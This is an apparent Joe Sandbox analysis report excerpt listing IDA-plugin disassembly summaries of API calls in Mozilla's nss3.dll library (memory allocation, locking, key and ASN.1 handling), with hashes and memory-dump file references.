                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9070af1e6f04dfa3efba8407b339dc91679361d3df6147c9a08640641ab7308b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a49774c3f40435cd96870ce5a0c4cda14823e1ee6805d91a97a2b230c5b6319c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9070af1e6f04dfa3efba8407b339dc91679361d3df6147c9a08640641ab7308b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D681E1B1E012059BDB248A68DC85BAE77B5AF4531CF344128E819E7B91E731E905CBF2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000,?), ref: 6CE738F2
                                                                                                                                                                                                                                                                                                                      • SECKEY_ECParamsToBasePointOrderLen.NSS3(-00000010,?,?,?,?,?), ref: 6CE73902
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6CE73AB0
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000038,?), ref: 6CE73AEA
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6CE73B03
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000020,?), ref: 6CE73B1C
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CE73B40
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE73B70
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE73B88
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE73B9D
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE73BB2
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE73BBD
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000010,?), ref: 6CE73BD4
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,-00000020,o^l), ref: 6CE73BF2
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyObject.NSS3(?,?), ref: 6CE73C1B
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE73C40
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$Copy$ArenaPool$ErrorFree$Arena_BaseCallDecodeDestroyFinishInitK11_ObjectOnceOrderParamsPointQuick
                                                                                                                                                                                                                                                                                                                      • String ID: o^l$security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3293387093-2181495056
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 124ece4ebf3ea70aaaadca6511888563cd6ec03c1560df1e78658479b373a3ff
                                                                                                                                                                                                                                                                                                                      • Instruction ID: cd7db1a9ed1c3e0df70d79f3b8f3526ca5c609e567d92e6b0602f6e36658bda2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 124ece4ebf3ea70aaaadca6511888563cd6ec03c1560df1e78658479b373a3ff
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8751C7B6A00205ABEB64CFA5ED81FAB73B8EB1520CF240529E806D7B51F725E509C771
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6CE52007
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6CE52077
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000002C), ref: 6CE520DF
                                                                                                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 6CE52188
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3 ref: 6CE521B7
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6CE5221C
                                                                                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CE522C2
                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6CE522CD
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE522DD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_GetPageSize.NSS3(6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_NewLogModule.NSS3(clock,6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F25
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3559583721-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: eb869548ff8c1f4d5eaff837ebf2798e36db850c01a6803e38d26d25a94c3ec2
                                                                                                                                                                                                                                                                                                                      • Instruction ID: aa3d65cd7ac2bb76c7cb1e6997ac6a06fb0297cb5d4b511d2665ae01e2592033
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb869548ff8c1f4d5eaff837ebf2798e36db850c01a6803e38d26d25a94c3ec2
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32918BB4B517018FDBA49F38C84975B7AF4BB16708F10442EE44AD7A40DB72A219CFA5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000010,00000054,?,00000008,00000054,00000000), ref: 6CE8DA45
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DA59
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DA89
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DA9D
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8DB0A
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE8DB1E
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8DB43
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE8DB57
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,6CE8D06D), ref: 6CE8DB7C
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6CE8D06D), ref: 6CE8DB90
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE8DBBD
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DC21
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,?,?,?,?), ref: 6CE8DC39
                                                                                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DC64
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,00000000,?,6CE8D06D), ref: 6CE8DC84
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DC98
                                                                                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,CE53436C,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DCE6
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CE8D06D), ref: 6CE8DD01
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionValue$Unlock$DoesK11_Mechanism$Error
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3890939128-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f95e1cd03de8b034a610a4de8645131cfa63248887357daa2f8aba7926f8883e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 03e5616e5fdaa2bbbe5c97f7e44ea06b74c35f5b260d2fce9a62d220b8a1805e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f95e1cd03de8b034a610a4de8645131cfa63248887357daa2f8aba7926f8883e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE1B478A01702CFD7109F24C884B66B7F0FF0A318F21896AE95A87B61D771FA55CB81
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000080), ref: 6CF79C70
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CF79C85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6CF79C96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CE521BC), ref: 6CE4BB8C
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CF79CA9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CF29946
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CDE16B7,00000000), ref: 6CF2994E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: free.MOZGLUE(00000000), ref: 6CF2995E
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CF79CB9
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CF79CC9
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6CF79CDA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE4BBEB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CE4BBFB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: GetLastError.KERNEL32 ref: 6CE4BC03
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CE4BC19
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: free.MOZGLUE(00000000), ref: 6CE4BC22
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(?), ref: 6CF79CF0
                                                                                                                                                                                                                                                                                                                      • PR_NewPollableEvent.NSS3 ref: 6CF79D03
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_CallOnce.NSS3(6CFC14B0,6CF6F510), ref: 6CF6F3E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_CreateIOLayerStub.NSS3(6CFC006C), ref: 6CF6F402
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_Malloc.NSS3(00000004), ref: 6CF6F416
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CF6F42D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_SetSocketOption.NSS3(?), ref: 6CF6F455
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF6F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CF6F473
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29890: TlsGetValue.KERNEL32(?,?,?,6CF297EB), ref: 6CF2989E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF79D78
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6CF79DAF
                                                                                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6CF79EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF79D9F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4B3C0: TlsGetValue.KERNEL32 ref: 6CE4B403
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CE4B459
                                                                                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6CF7A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF79DE8
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6CF79DFC
                                                                                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6CF7A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF79E29
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6CF79E3D
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF79E71
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF79E89
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e88ad4b09250fa01dc8b2a084d1079fbef55e4fad5551e347fb6949f6d73716e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 851fae801fce3232a20b934a237e01d11c4d05e92798e8fdb6039aae3577b87a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e88ad4b09250fa01dc8b2a084d1079fbef55e4fad5551e347fb6949f6d73716e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E614DB1E00B06AFD714DF75D844AA7BBF8FF08208B14452AE859C7B50EB70E914CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6CE74014
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE739F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CE75E6F,?), ref: 6CE73A08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE739F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CE75E6F), ref: 6CE73A1C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE739F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE73A3C
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE74038
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CE7404D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CF8A0F4), ref: 6CE740C2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CEBF0C8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEBF122
                                                                                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6CE7409A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE6E708,00000000,00000000,00000004,00000000), ref: 6CEBBE6A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE704DC,?), ref: 6CEBBE7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEBBEC2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE740DE
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE740F4
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE74108
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6CE7411A
                                                                                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6CE74137
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6CE74150
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6CF8A1C8), ref: 6CE7417E
                                                                                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6CE74194
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CE741A7
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE741B2
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyObject.NSS3(?,?), ref: 6CE741D9
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE741FC
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CF8A1A8), ref: 6CE7422D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 912348568-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1eadb8792c01728837595075a9c05b9d44c8937f2b94bb491fd06d4a53c53442
                                                                                                                                                                                                                                                                                                                      • Instruction ID: da326cfd716829d43a93f42bf45ce6488a15ac358f5a4f4d4e773637a30eb680
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1eadb8792c01728837595075a9c05b9d44c8937f2b94bb491fd06d4a53c53442
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E5127B6B003006BF720AA699D41B6776FCDF5124CF24052EE85AD6F92FB31E414CA72
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8E7B
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8E9E
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(6CFC0B64,00000001,?,?,?,?,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8EAD
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8EC3
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8ED8
